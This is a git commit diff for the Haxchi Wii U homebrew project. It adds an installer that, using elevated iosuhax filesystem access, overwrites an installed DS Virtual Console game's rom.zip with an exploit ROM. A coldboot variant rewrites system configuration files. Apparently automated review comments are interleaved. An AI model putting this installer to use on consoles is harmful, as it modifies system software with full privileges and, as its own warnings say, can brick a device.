- Added the haxchi installer

- Move roms creation into sub folder
- re-add support for other base games
orboditilt 2019-08-14 22:06:31 +02:00
parent 2ff7a483fe
commit ba142e1ca0
34 changed files with 2308 additions and 57 deletions

.gitignore vendored

@ -1,4 +1,2 @@
*.nds
*.zip
*.bin
defines.s
haxchi_installer/data/
haxchi_installer/src/zipList.h


@ -1,30 +1,7 @@
.PHONY := all code550.bin
ifeq ($(Windows_NT), 1)
ZIP = zip/zip.exe
else
ZIP = zip
endif
HAXCHI_S = haxchi.s
ROP_S = haxchi_rop.s
ROP_BIN = haxchi_rop.bin
all: clean brainage rom.zip
brainage: setup_brainage brainage.nds
setup_brainage:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f brainage_defs.s defines.s
brainage.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds brainage.nds
rom.zip:
$(ZIP) -JXjq9 rom.zip brainage.nds
all:
$(MAKE) -C "payload_generator"
$(MAKE) -C "haxchi_installer"
clean:
@rm -f *.zip *.nds defines.s
@echo "all cleaned up !"
$(MAKE) -C "payload_generator" clean
$(MAKE) -C "haxchi_installer" clean
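Review bot: Neither `all` nor `clean` on the new side is declared phony, so a file or directory named `all` or `clean` next to this Makefile would make either target report "up to date" and never recurse into the sub-projects; the removed `.PHONY := all code550.bin` was a variable assignment rather than the special target, so this was already latent before the rewrite. Add `.PHONY: all clean` above the two rules. The file header for this section is missing from the page, so that this is the top-level Makefile is inferred only from the `$(MAKE) -C "payload_generator"` / `$(MAKE) -C "haxchi_installer"` recipes.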


@ -1,22 +1,13 @@
# Haxchi
This is the continuation of Haxchi from FIX94 (initial PoC by smea).
# Usage
Put a payload `code550.bin` in the root of this project.
This payload should be statically linked to 0x18000000, and is called inside a thread.
Make sure to exit this thread via `OSExitThread(0);`, afterwards the rop switches automatically to the Mii Maker.
This repository consists of two parts:
An example payload which perform the kernel exploit can be found [here](https://github.com/wiiu-env/haxchi_payload).
- payload_generator, which will be used to create the target ROM which contain haxhi.
- haxchi_installer, is an installer which can be used to install haxchi onto your console.
# Notes
Currently this ONLY executes a given `code550.bin`, nothing usable for the end user. Only one game, no CFW, no coldboothax, nothing.
## Dependencies
armnips and zip
## Building
Checkout the individual READMEs of those two folder to get more information about building.
## credit
smea, plutoo, yellows8, naehrwert, derrek, FIX94, dimok and orboditilt.

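--- a/haxchi_installer/.gitignore
+++ b/haxchi_installer/.gitignore
@@ -0,0 +1,16 @@
+/fs/build
+/installer/bin
+/loader/build
+/menu/build
+/server/logs/*.txt
+/build
+/*.elf
+/fs/*.elf
+/loader/*.elf
+/sd_loader/build
+/sd_loader/*.elf
+/udp_debug_reader/obj
+/udp_debug_reader/GeckoLog.txt
+*.cscope_file_list
+*.rpx
+*.cbp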

haxchi_installer/Makefile Normal file

@ -0,0 +1,138 @@
#-------------------------------------------------------------------------------
.SUFFIXES:
#-------------------------------------------------------------------------------
ifeq ($(strip $(DEVKITPRO)),)
$(error "Please set DEVKITPRO in your environment. export DEVKITPRO=<path to>/devkitpro")
endif
TOPDIR ?= $(CURDIR)
include $(DEVKITPRO)/wut/share/wut_rules
#-------------------------------------------------------------------------------
# TARGET is the name of the output
# BUILD is the directory where object files & intermediate files will be placed
# SOURCES is a list of directories containing source code
# DATA is a list of directories containing data files
# INCLUDES is a list of directories containing header files
#-------------------------------------------------------------------------------
TARGET := $(notdir $(CURDIR))
BUILD := build
SOURCES := src \
src/utils
DATA := data
INCLUDES := src
#-------------------------------------------------------------------------------
# options for code generation
#-------------------------------------------------------------------------------
CFLAGS := -g -Wall -O2 -ffunction-sections \
$(MACHDEP)
CFLAGS += $(INCLUDE) -D__WIIU__ -D__WUT__ -D_GNU_SOURCE
CXXFLAGS := $(CFLAGS)
ASFLAGS := -g $(ARCH)
LDFLAGS = -g $(ARCH) $(RPXSPECS) -Wl,-Map,$(notdir $*.map)
LIBS := -lxml2 -lz -liosuhax -lwut
#-------------------------------------------------------------------------------
# list of directories containing libraries, this must be the top level
# containing include and lib
#-------------------------------------------------------------------------------
LIBDIRS := $(PORTLIBS) $(WUT_ROOT)
#-------------------------------------------------------------------------------
# no real need to edit anything past this point unless you need to add additional
# rules for different file extensions
#-------------------------------------------------------------------------------
ifneq ($(BUILD),$(notdir $(CURDIR)))
#-------------------------------------------------------------------------------
export OUTPUT := $(CURDIR)/$(TARGET)
export TOPDIR := $(CURDIR)
export VPATH := $(foreach dir,$(SOURCES),$(CURDIR)/$(dir)) \
$(foreach dir,$(DATA),$(CURDIR)/$(dir))
export DEPSDIR := $(CURDIR)/$(BUILD)
CFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.c)))
CPPFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.cpp)))
SFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.s)))
BINFILES := $(foreach dir,$(DATA),$(notdir $(wildcard $(dir)/*.*)))
#-------------------------------------------------------------------------------
# use CXX for linking C++ projects, CC for standard C
#-------------------------------------------------------------------------------
ifeq ($(strip $(CPPFILES)),)
#-------------------------------------------------------------------------------
export LD := $(CC)
#-------------------------------------------------------------------------------
else
#-------------------------------------------------------------------------------
export LD := $(CXX)
#-------------------------------------------------------------------------------
endif
#-------------------------------------------------------------------------------
export OFILES_BIN := $(addsuffix .o,$(BINFILES))
export OFILES_SRC := $(CPPFILES:.cpp=.o) $(CFILES:.c=.o) $(SFILES:.s=.o)
export OFILES := $(OFILES_BIN) $(OFILES_SRC)
export HFILES_BIN := $(addsuffix .h,$(subst .,_,$(BINFILES)))
export INCLUDE := $(foreach dir,$(INCLUDES),-I$(CURDIR)/$(dir)) \
$(foreach dir,$(LIBDIRS),-I$(dir)/include) \
-I$(CURDIR)/$(BUILD) -I$(PORTLIBS_PATH)/ppc/include/libxml2
export LIBPATHS := $(foreach dir,$(LIBDIRS),-L$(dir)/lib)
.PHONY: $(BUILD) clean all
#-------------------------------------------------------------------------------
all: $(BUILD)
$(BUILD):
@[ -d $@ ] || mkdir -p $@
sh ./filelist.sh
@$(MAKE) --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile
#-------------------------------------------------------------------------------
clean:
@echo clean ...
@rm -fr $(BUILD) $(TARGET).rpx $(TARGET).elf
#-------------------------------------------------------------------------------
else
.PHONY: all
DEPENDS := $(OFILES:.o=.d)
#-------------------------------------------------------------------------------
# main targets
#-------------------------------------------------------------------------------
all : $(OUTPUT).rpx
$(OUTPUT).rpx : $(OUTPUT).elf
$(OUTPUT).elf : $(OFILES)
$(OFILES_SRC) : $(HFILES_BIN)
#-------------------------------------------------------------------------------
# you need a rule like this for each extension you use as binary data
#-------------------------------------------------------------------------------
%.bin.o %_bin.h : %.bin
@echo $(notdir $<)
@$(bin2o)
%.zip.o %_zip.h : %.zip
@echo $(notdir $<)
@$(bin2o)
-include $(DEPENDS)
#-------------------------------------------------------------------------------
endif
#-------------------------------------------------------------------------------
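Review bot: The `$(BUILD)` recipe runs the resource-list generator as `sh ./filelist.sh`, but the filelist.sh added in this commit carries a `#! /bin/bash` shebang and uses bash-only constructs (`[[ $OSTYPE == darwin* ]]`, the indexed array assignment `files[count]=$i`), so on hosts where `sh` is dash the step dies with a syntax error before any object is compiled. Invoke it with the interpreter it was written for, `bash ./filelist.sh`, or mark it executable and run `./filelist.sh` so the shebang applies. It also runs on every `make` invocation rather than as a rule with the files in `data/` as prerequisites; that only costs time, since the script itself skips regeneration when the file count is unchanged.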


@ -0,0 +1,22 @@
# Haxchi Installer
This installer can be used to install haxchi onto your console.
To install haxchi, you need a compatible title installed on your console.
## Building
Before you can build the haxchi installer, make sure to generate the haxchi-payloads using the payload-generator.
You also need [wut](https://github.com/devkitPro/wut/), [libiosuhax](https://github.com/wiiu-env/libiosuhax) and the following portlibs installed:
```
pacman -Syu ppc-zlib ppc-libxml2
```
Then compile the installer via
```
make
```
## Usage
Start the resulting `haxchi_installer.rpx` using the {homebrew launcher](https://github.com/wiiu-env/homebrew_launcher)
## credit
FIX94 and orboditilt.


@ -0,0 +1,60 @@
#! /bin/bash
#
# Automatic resource file list generation
# Created by Dimok
outFile="./src/ziplist.h"
count_old=$(cat $outFile 2>/dev/null | tr -d '\n\n' | sed 's/[^0-9]*\([0-9]*\).*/\1/')
count=0
if [[ $OSTYPE == darwin* ]];
then
for i in $(gfind ./data/ -maxdepth 1 -type f \( ! -printf "%f\n" \) | sort -f)
do
files[count]=$i
count=$((count+1))
done
else
for i in $(find ./data/ -maxdepth 1 -type f \( ! -printf "%f\n" \) | sort -f)
do
files[count]=$i
count=$((count+1))
done
fi
if [ "$count_old" != "$count" ] || [ ! -f $outFile ]
then
echo "Generating filelist.h for $count files." >&2
cat <<EOF > $outFile
/****************************************************************************
* This file is generated automatically.
* Includes $count files.
*
* NOTE:
* Any manual modification of this file will be overwriten by the generation.
****************************************************************************/
#ifndef _ZIPLIST_H_
#define _ZIPLIST_H_
EOF
for i in ${files[@]}
do
filename=${i%.*}
extension=${i##*.}
echo 'extern const unsigned char '$filename'_'$extension'[];' >> $outFile
echo 'extern const unsigned int '$filename'_'$extension'_size;' >> $outFile
echo '' >> $outFile
done
echo '' >> $outFile
echo '#endif' >> $outFile
fi
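Review bot: The generated header is written to `./src/ziplist.h` (`outFile`), while `gameList.h` in this commit includes `"zipList.h"` and the top-level `.gitignore` now lists `haxchi_installer/src/zipList.h`; on a case-sensitive filesystem, which is the usual devkitPro host, the include will not resolve and the generated file will not be ignored by git. Set `outFile="./src/zipList.h"` so all three agree. Separately, the regeneration check compares only the number of files in `data/`, so renaming a ROM zip without changing the count leaves a stale header declaring the old symbol names; comparing the sorted list (or simply regenerating unconditionally, which is cheap here) would be safer. The progress message also says `filelist.h` while the file written is the zip list.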


@ -0,0 +1,106 @@
#ifndef _GAMELIST_H_
#define _GAMELIST_H_
#include "zipList.h"
typedef struct _gList_t {
uint32_t tid;
char name[64];
const unsigned char *romPtr;
const unsigned int *romSizePtr;
} gList_t;
gList_t GameList[] = {
{ 0x10179A00, "Kawashima: Motto Nou wo Kitaeru Otona no DS Training [JPN]", brainage_zip, &brainage_zip_size },
{ 0x10179B00, "Brain Age: Train Your Brain in Minutes a Day! [USA]", brainage_zip, &brainage_zip_size },
{ 0x10179C00, "Dr. Kawashima's Brain Training [PAL]", brainage_zip, &brainage_zip_size },
{ 0x10179D00, "Catch! Touch! Yoshi! [JPN]", yoshitouchandgo_zip, &yoshitouchandgo_zip_size },
{ 0x10179E00, "Yoshi Touch & Go [USA]", yoshitouchandgo_zip, &yoshitouchandgo_zip_size },
{ 0x10179F00, "Yoshi Touch & Go [PAL]", yoshitouchandgo_zip, &yoshitouchandgo_zip_size },
{ 0x10195600, "Mario Kart DS [JPN]", mariokartds_zip, &mariokartds_zip_size },
{ 0x10195700, "Mario Kart DS [USA]", mariokartds_zip, &mariokartds_zip_size },
{ 0x10195800, "Mario Kart DS [PAL]", mariokartds_zip, &mariokartds_zip_size },
{ 0x10195900, "New Super Mario Bros. [JPN]", newsmb_zip, &newsmb_zip_size },
{ 0x10195A00, "New Super Mario Bros. [USA]", newsmb_zip, &newsmb_zip_size },
{ 0x10195B00, "New Super Mario Bros. [PAL]", newsmb_eur_zip, &newsmb_eur_zip_size },
{ 0x10198800, "Yoshi's Island DS [JPN]", yoshids_zip, &yoshids_zip_size },
{ 0x10198900, "Yoshi's Island DS [USA]", yoshids_zip, &yoshids_zip_size },
{ 0x10198A00, "Yoshi's Island DS [PAL]", yoshids_zip, &yoshids_zip_size },
{ 0x10198B00, "Yawaraka Atama Juku [JPN]", bigbrainacademy_zip, &bigbrainacademy_zip_size },
{ 0x10198C00, "Big Brain Academy [USA]", bigbrainacademy_zip, &bigbrainacademy_zip_size },
{ 0x10198D00, "Big Brain Academy [PAL]", bigbrainacademy_zip, &bigbrainacademy_zip_size },
{ 0x101A1E00, "Sawaru: Made in Wario [JPN]", wwtouched_zip, &wwtouched_zip_size },
{ 0x101A1F00, "WarioWare: Touched! [USA]", wwtouched_zip, &wwtouched_zip_size },
{ 0x101A2000, "WarioWare: Touched! [PAL]", wwtouched_zip, &wwtouched_zip_size },
{ 0x101A2100, "Mario & Luigi RPG 2x2 [JPN]", partnersintime_zip, &partnersintime_zip_size },
{ 0x101A2200, "Mario & Luigi: Partners in Time [USA]", partnersintime_zip, &partnersintime_zip_size },
{ 0x101A2300, "Mario & Luigi: Partners in Time [PAL]", partnersintime_zip, &partnersintime_zip_size },
{ 0x101A5200, "Donkey Kong: Jungle Climber [JPN]", dkjclimber_zip, &dkjclimber_zip_size },
{ 0x101A5300, "DK: Jungle Climber [USA]", dkjclimber_zip, &dkjclimber_zip_size },
{ 0x101A5400, "Donkey Kong: Jungle Climber [PAL]", dkjclimber_zip, &dkjclimber_zip_size },
{ 0x101A5500, "Hoshi no Kirby: Sanjou! Dorocche Dan [JPN]", kirby_zip, &kirby_zip_size },
{ 0x101A5600, "Kirby: Squeak Squad [USA]", kirby_zip, &kirby_zip_size },
{ 0x101A5700, "Kirby: Mouse Attack [PAL]", kirby_zip, &kirby_zip_size },
{ 0x101ABD00, "Kaitou Wario the Seven [JPN]", masterofdisguise_zip, &masterofdisguise_zip_size },
{ 0x101ABE00, "Wario: Master of Disguise [USA]", masterofdisguise_zip, &masterofdisguise_zip_size },
{ 0x101ABF00, "Wario: Master of Disguise [PAL]", masterofdisguise_zip, &masterofdisguise_zip_size },
{ 0x101AC000, "Star Fox Command [JPN]", sfcommand_zip, &sfcommand_zip_size },
{ 0x101AC100, "Star Fox Command [USA]", sfcommand_zip, &sfcommand_zip_size },
{ 0x101AC200, "Star Fox Command [PAL]", sfcommand_zip, &sfcommand_zip_size },
{ 0x101B8800, "Touch! Kirby's Magic Paintbrush [JPN]", kirbycanvascurse_zip, &kirbycanvascurse_zip_size },
{ 0x101B8900, "Kirby: Canvas Curse [USA]", kirbycanvascurse_zip, &kirbycanvascurse_zip_size },
{ 0x101B8A00, "Kirby: Power Paintbrush [PAL]", kirbycanvascurse_zip, &kirbycanvascurse_zip_size },
{ 0x101B8B00, "Zelda no Densetsu: Daichi no Kiteki [JPN]", zeldast_zip, &zeldast_zip_size },
{ 0x101B8C00, "The Legend of Zelda: Spirit Tracks [USA]", zeldast_zip, &zeldast_zip_size },
{ 0x101B8D00, "The Legend of Zelda: Spirit Tracks [PAL]", zeldast_zip, &zeldast_zip_size },
{ 0x101C3300, "Super Mario 64 DS [JPN]", sm64ds_zip, &sm64ds_zip_size },
{ 0x101C3400, "Super Mario 64 DS [USA]", sm64ds_zip, &sm64ds_zip_size },
{ 0x101C3500, "Super Mario 64 DS [PAL]", sm64ds_zip, &sm64ds_zip_size },
{ 0x101C3600, "Zelda no Densetsu: Mugen no Sunadokei [JPN]", zeldaph_zip, &zeldaph_zip_size },
{ 0x101C3700, "The Legend of Zelda: Phantom Hourglass [USA]", zeldaph_zip, &zeldaph_zip_size },
{ 0x101C3800, "The Legend of Zelda: Phantom Hourglass [PAL]", zeldaph_zip, &zeldaph_zip_size },
{ 0x101C8600, "Atsumete! Kirby [JPN]", kirbymassattack_zip, &kirbymassattack_zip_size },
{ 0x101C8700, "Kirby Mass Attack [USA]", kirbymassattack_zip, &kirbymassattack_zip_size },
{ 0x101C8800, "Kirby Mass Attack [PAL]", kirbymassattack_zip, &kirbymassattack_zip_size },
{ 0x101CC200, "Pokemon Ranger [JPN]", pokemonranger_zip, &pokemonranger_zip_size },
{ 0x101CC300, "Pokemon Ranger [USA]", pokemonranger_zip, &pokemonranger_zip_size },
{ 0x101CC400, "Pokemon Ranger [PAL]", pokemonranger_zip, &pokemonranger_zip_size },
{ 0x101D1F00, "Oideyo Doubutsu no Mori [JPN]", animalcrossing_zip, &animalcrossing_zip_size },
{ 0x101D2000, "Animal Crossing: Wild World [USA]", animalcrossing_zip, &animalcrossing_zip_size },
{ 0x101D2100, "Animal Crossing: Wild World [PAL]", animalcrossing_zip, &animalcrossing_zip_size },
{ 0x101E0C00, "Pokemon Fushigi no Dungeon: Sora no Tankentai [JPN]", explorersofsky_zip, &explorersofsky_zip_size },
{ 0x101E0D00, "Pokemon Mystery Dungeon: Explorers of Sky [USA]", explorersofsky_zip, &explorersofsky_zip_size },
{ 0x101E0E00, "Pokemon Mystery Dungeon: Explorers of Sky [PAL]", explorersofsky_zip, &explorersofsky_zip_size },
{ 0x101E0F00, "Pokemon Ranger: Batonnage [JPN]", shadowsofalmia_zip, &shadowsofalmia_zip_size },
{ 0x101E1000, "Pokemon Ranger: Shadows of Almia [USA]", shadowsofalmia_zip, &shadowsofalmia_zip_size },
{ 0x101E1100, "Pokemon Ranger: Shadows of Almia [PAL]", shadowsofalmia_zip, &shadowsofalmia_zip_size },
{ 0x101E6F00, "Pokemon Ranger: Hikari no Kiseki [JPN]", guardiansigns_zip, &guardiansigns_zip_size },
{ 0x101E7000, "Pokemon Ranger: Guardian Signs [USA]", guardiansigns_zip, &guardiansigns_zip_size },
{ 0x101E7100, "Pokemon Ranger: Guardian Signs [PAL]", guardiansigns_zip, &guardiansigns_zip_size },
};
static const int GameListSize = sizeof(GameList) / sizeof(gList_t);
#endif
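Review bot: `GameList` is defined with external linkage in a header (`gList_t GameList[] = {`), so any second translation unit that includes `gameList.h` produces a duplicate-symbol link error, and the lookup table is left writable although nothing here should ever modify it; `GameListSize` directly below is already `static`. Declare it `static const gList_t GameList[] = {` so each includer gets a private read-only copy (the `romPtr`/`romSizePtr` fields of `gList_t` are already `const`-qualified, so the initialisers are unaffected). The header also uses `uint32_t` without including `<stdint.h>`, relying on whatever the includer pulled in first; add `#include <stdint.h>` next to the `zipList.h` include.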

haxchi_installer/src/main.c Normal file

@ -0,0 +1,817 @@
/*
* Copyright (C) 2016-2017 FIX94
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
#include <string.h>
#include <malloc.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <iosuhax.h>
#include <coreinit/mcp.h>
#include <vpad/input.h>
#include <whb/proc.h>
#include <whb/log.h>
#include <whb/log_console.h>
#include <coreinit/foreground.h>
#include <coreinit/systeminfo.h>
#include <proc_ui/procui.h>
#include <sysapp/launch.h>
#include <libxml/parser.h>
#include <libxml/tree.h>
#include <libxml/xpath.h>
#include "main.h"
#include "gameList.h"
#include "memory.h"
static const char *sdCardVolPath = "/vol/storage_sdcard_new";
#ifdef CB
static const char *systemXmlPath = "/vol/system/config/system.xml";
static const char *systemXmlPath2 = "/vol/system/config/system_new.xml";
static const char *syshaxXmlPath = "/vol/system/config/syshax.xml";
#endif
//just to be able to call async
void someFunc(void *arg)
{
(void)arg;
}
extern void OSForceFullRelaunch(void);
extern unsigned long long(*_SYSGetSystemApplicationTitleId)(int sysApp);
void println_noflip(int line, const char *msg)
{
WHBLogPrintf(msg);
WHBLogConsoleDraw();
}
void println(int line, const char *msg)
{
WHBLogPrintf(msg);
WHBLogConsoleDraw();
}
typedef struct _parsedList_t {
uint32_t tid;
char name[64];
char path[64];
uint8_t *romPtr;
uint32_t romSize;
} parsedList_t;
int fsa_read(int fsa_fd, int fd, void *buf, int len)
{
int done = 0;
uint8_t *buf_uint8_t = (uint8_t*)buf;
while(done < len)
{
size_t read_size = len - done;
int result = IOSUHAX_FSA_ReadFile(fsa_fd, buf_uint8_t + done, 0x01, read_size, fd, 0);
if(result < 0)
return result;
else
done += result;
}
return done;
}
int fsa_write(int fsa_fd, int fd, void *buf, int len)
{
int done = 0;
uint8_t *buf_uint8_t = (uint8_t*)buf;
while(done < len)
{
size_t write_size = len - done;
int result = IOSUHAX_FSA_WriteFile(fsa_fd, buf_uint8_t + done, 0x01, write_size, fd, 0);
if(result < 0)
return result;
else
done += result;
}
return done;
}
int availSort(const void *c1, const void *c2)
{
return strcmp(((parsedList_t*)c1)->name,((parsedList_t*)c2)->name);
}
void printhdr_noflip()
{
#ifdef CB
println_noflip(0,"CBHC v1.6 by FIX94");
#else
println_noflip(0,"Haxchi v2.5u2 by FIX94");
#endif
println_noflip(1,"Credits to smea, plutoo, yellows8, naehrwert, derrek and dimok");
}
static uint32_t
procSaveCallback(void *context) {
OSSavesDone_ReadyToRelease();
return 0;
}
int cleanupAndExitToHBL(){
memoryRelease();
WHBLogConsoleFree();
WHBProcShutdown();
return EXIT_SUCCESS;
}
int main(void)
{
OSEnableHomeButtonMenu(FALSE);
WHBProcInit();
WHBLogConsoleInit();
VPADInit();
memoryInitialize();
int mcp_handle = MCP_Open();
int count = MCP_TitleCount(mcp_handle);
int listSize = count*sizeof(MCPTitleListType);
MCPTitleListType *tList = (MCPTitleListType*)memalign(32, listSize); //cant be in MEMBucket
memset(tList, 0, listSize);
uint32_t recievedCount = count;
MCP_TitleList(mcp_handle, &recievedCount, tList, listSize);
MCP_Close(mcp_handle);
int gAvailCnt = 0;
parsedList_t *gAvail = (parsedList_t*)MEMBucket_alloc(recievedCount*sizeof(parsedList_t), 4);
memset(gAvail, 0, recievedCount*sizeof(parsedList_t));
int i, j;
for(i = 0; i < recievedCount; i++)
{
MCPTitleListType cListElm = tList[i];
if(memcmp(cListElm.indexedDevice,"mlc",4) != 0 || ((cListElm.titleId & 0xFFFFFFFF00000000L) != 0x0005000000000000L))
continue;
for(j = 0; j < GameListSize; j++)
{
if((cListElm.titleId & 0x00000000FFFFFFFFL) == GameList[j].tid)
{
gAvail[gAvailCnt].tid = GameList[j].tid;
memcpy(gAvail[gAvailCnt].name, GameList[j].name, 64);
memcpy(gAvail[gAvailCnt].path, cListElm.path, 64);
gAvail[gAvailCnt].romPtr = GameList[j].romPtr;
gAvail[gAvailCnt].romSize = *(GameList[j].romSizePtr);
gAvailCnt++;
break;
}
}
}
int vpadError = -1;
VPADStatus vpad;
if(gAvailCnt == 0)
{
printhdr_noflip();
println_noflip(2,"No games found on NAND! Make sure that you have your DS VC");
println_noflip(3,"game installed on NAND and have all of your USB Devices");
println_noflip(4,"disconnected while installing Haxchi as it can lead to issues.");
println_noflip(5,"Press any button to return to Homebrew Launcher.");
while(1)
{
usleep(25000);
VPADRead(0, &vpad, 1, &vpadError);
if(vpadError != 0)
continue;
if(vpad.trigger | vpad.hold)
break;
}
return cleanupAndExitToHBL();
}
qsort(gAvail,gAvailCnt,sizeof(parsedList_t),availSort);
uint32_t redraw = 1;
int32_t PosX = 0;
int32_t ScrollX = 0;
int32_t ListMax = gAvailCnt;
if( ListMax > 13 )
ListMax = 13;
uint32_t UpHeld = 0, triggerHeld = 0;
while(1)
{
usleep(25000);
VPADRead(0, &vpad, 1, &vpadError);
if(vpadError != 0)
continue;
if((vpad.trigger | vpad.hold) & VPAD_BUTTON_HOME)
{
return cleanupAndExitToHBL();
}
if( vpad.hold & VPAD_BUTTON_DOWN)
{
if(triggerHeld == 0 || triggerHeld > 10)
{
if( PosX + 1 >= ListMax )
{
if( PosX + 1 + ScrollX < gAvailCnt)
ScrollX++;
else {
PosX = 0;
ScrollX = 0;
}
} else {
PosX++;
}
redraw = 1;
}
triggerHeld++;
}
else
triggerHeld = 0;
if( vpad.hold & VPAD_BUTTON_UP )
{
if(UpHeld == 0 || UpHeld > 10)
{
if( PosX <= 0 )
{
if( ScrollX > 0 )
ScrollX--;
else {
PosX = ListMax - 1;
ScrollX = gAvailCnt - ListMax;
}
} else {
PosX--;
}
redraw = 1;
}
UpHeld++;
}
else
UpHeld = 0;
if( vpad.trigger & VPAD_BUTTON_A )
break;
if( redraw )
{
printhdr_noflip();
println_noflip(2,"Please select the game for the Installation from the list below.");
// Starting position.
int gamelist_y = 4;
for (i = 0; i < ListMax; ++i, gamelist_y++)
{
const parsedList_t *cur_gi = &gAvail[i+ScrollX];
char printStr[64];
sprintf(printStr,"%c %s", i == PosX ? '>' : ' ', cur_gi->name);
println_noflip(gamelist_y, printStr);
}
redraw = 0;
}
}
#ifdef CB
int action = 0;
#endif
const parsedList_t *SelectedGame = &gAvail[PosX + ScrollX];
println_noflip(2,"You have selected the following game:");
println_noflip(3,SelectedGame->name);
#ifdef CB
println_noflip(4,"Press A to install CBHC, B to remove coldboothax, HOME to Exit.");
println_noflip(5,"WARNING, INSTALLING CBHC CAN POTENTIALLY BRICK YOUR SYSTEM!");
println_noflip(6,"NEVER UNINSTALL OR MOVE THE SELECTED GAME OR YOUR WIIU IS DEAD!");
#else
println_noflip(4,"This will install Haxchi. To remove it you have to delete and");
println_noflip(5,"re-install the game. If you are sure press A, else press HOME.");
#endif
while(1)
{
usleep(25000);
VPADRead(0, &vpad, 1, &vpadError);
if(vpadError != 0)
continue;
//user aborted
if((vpad.trigger | vpad.hold) & VPAD_BUTTON_HOME)
{
return cleanupAndExitToHBL();
}
//lets go!
if(vpad.trigger & VPAD_BUTTON_A)
break;
#ifdef CB
if(vpad.trigger & VPAD_BUTTON_B)
{
action = 1;
break;
}
#endif
}
#ifdef CB
unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0);
char sysmenuId[20];
memset(sysmenuId, 0, 20);
sprintf(sysmenuId, "%08x%08x", (uint32_t)((sysmenuIdUll>>32)&0xFFFFFFFF),(uint32_t)(sysmenuIdUll&0xFFFFFFFF));
char new_title_id[20];
memset(new_title_id, 0, 20);
sprintf(new_title_id, "00050000%08x", SelectedGame->tid);
int line = 7;
#else
int line = 6;
#endif
int fsaFd = -1;
int sdMounted = 0;
int sdFd = -1, mlcFd = -1, slcFd = -1;
//open up iosuhax
int res = IOSUHAX_Open(NULL);
if(res < 0)
{
println(line++,"IOSUHAX_Open failed");
goto prgEnd;
}
//mount with full permissions
fsaFd = IOSUHAX_FSA_Open();
if(fsaFd < 0)
{
println(line++,"FSA could not be opened!");
goto prgEnd;
}
#ifdef CB
if(action == 1)
{
if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath, "rb", &slcFd) >= 0)
{
//read in system xml file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, slcFd, &stats);
size_t sysXmlSize = stats.size;
char *sysXmlBuf = MEMBucket_alloc(sysXmlSize+1,4);
memset(sysXmlBuf, 0, sysXmlSize+1);
fsa_read(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
xmlDocPtr doc = xmlReadMemory(sysXmlBuf, sysXmlSize, "system.xml", "utf-8", 0);
//verify title id
int idFound = 0, idCorrect = 0;
xmlNode *root_element = xmlDocGetRootElement(doc);
xmlNode *cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "default_title_id", 17) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
if(memcmp(new_title_id, (char*)xmlNodeGetContent(cur_node), 17) == 0) idCorrect++;
idFound++;
}
}
}
xmlFreeDoc(doc);
MEMBucket_free(sysXmlBuf);
if(idFound != 1)
println(line++,"default_title_id missing!");
else if(idCorrect != 1)
println(line++,"default_title_id not set to selected DS VC!");
else
{
if(IOSUHAX_FSA_OpenFile(fsaFd, syshaxXmlPath, "rb", &slcFd) >= 0)
{
//read in system xml file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, slcFd, &stats);
size_t sysXmlSize = stats.size;
sysXmlBuf = MEMBucket_alloc(sysXmlSize+1,4);
memset(sysXmlBuf, 0, sysXmlSize+1);
fsa_read(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
xmlDocPtr doc = xmlReadMemory(sysXmlBuf, sysXmlSize, "syshax.xml", "utf-8", 0);
//verify title id
int idFound = 0, idCorrect = 0;
xmlNode *root_element = xmlDocGetRootElement(doc);
xmlNode *cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "default_title_id", 17) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
if(memcmp(sysmenuId, (char*)xmlNodeGetContent(cur_node), 17) == 0) idCorrect++;
idFound++;
}
}
}
xmlFreeDoc(doc);
if(idFound != 1)
println(line++,"default_title_id missing!");
else if(idCorrect != 1)
println(line++,"default_title_id not set to System Menu!");
else
{
if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath, "wb", &slcFd) >= 0)
{
println(line++,"Restoring system.xml...");
fsa_write(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
println(line++,"Removed coldboothax!");
}
}
MEMBucket_free(sysXmlBuf);
}
else
println(line++,"syshax.xml backup not found, aborting!");
}
}
goto prgEnd;
}
#endif
int ret = IOSUHAX_FSA_Mount(fsaFd, "/dev/sdcard01", sdCardVolPath, 2, (void*)0, 0);
if(ret < 0)
{
println(line++,"Failed to mount SD!");
goto prgEnd;
}
else
sdMounted = 1;
char path[256];
sprintf(path,"%s/content/0010/rom.zip",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "rb", &mlcFd) < 0)
{
println(line++,"No already existing rom.zip found in the game!");
println(line++,"Make sure to re-install your DS title and try again.");
goto prgEnd;
}
else
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing rom.zip...");
fsa_write(fsaFd, mlcFd, SelectedGame->romPtr, SelectedGame->romSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
char sdHaxchiPath[256];
#ifdef CB
